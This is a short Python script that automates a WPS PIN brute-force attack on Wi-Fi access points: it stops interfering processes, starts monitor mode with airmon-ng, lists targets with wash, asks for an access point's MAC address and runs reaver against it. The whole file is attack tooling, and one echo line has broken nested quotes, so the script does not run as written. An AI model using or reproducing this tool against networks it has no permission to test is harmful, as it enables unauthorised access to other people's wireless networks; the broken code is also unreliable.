#!/usr/bin/python
import os
import socket

os.system("clear")
os.system("airmon-ng check kill")
os.system("airmon-ng start wlan0")
os.system("wash -i wlan0mon")
os.system("echo "Control+C when your done looking")
MACinput=raw_input("\nEnter MAC Address for Accesspoint:")

os.system("reaver -i wlan0mon -b " + MACinput + " -d 30 -S -N -vv")
